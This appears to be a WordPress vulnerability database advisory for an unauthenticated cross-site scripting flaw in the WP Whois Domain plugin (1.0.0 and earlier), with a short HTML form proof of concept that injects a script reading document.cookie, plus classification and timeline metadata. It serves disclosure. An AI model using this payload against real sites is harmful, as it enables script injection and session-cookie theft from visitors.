WordPress Plugin Vulnerabilities
WP Whois Domain <= 1.0.0 - Unauthenticated Cross-Site Scripting (XSS)
Description
The plugin is still affected and has been closed.
Proof of Concept
<form action="[url of page with the whois form]" method="post"> <input type="hidden" name="domain" value=""><script>alert(document.cookie)</script>"> <input type="submit" value="Submit"> </form>
Affects Plugins
References
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Submitter
ethicalhack3r
Submitter twitter
Verified
No
WPVDB ID
Timeline
Publicly Published
2016-11-28 (about 7 years ago)
Added
2016-12-01 (about 7 years ago)
Last Updated
2020-09-22 (about 3 years ago)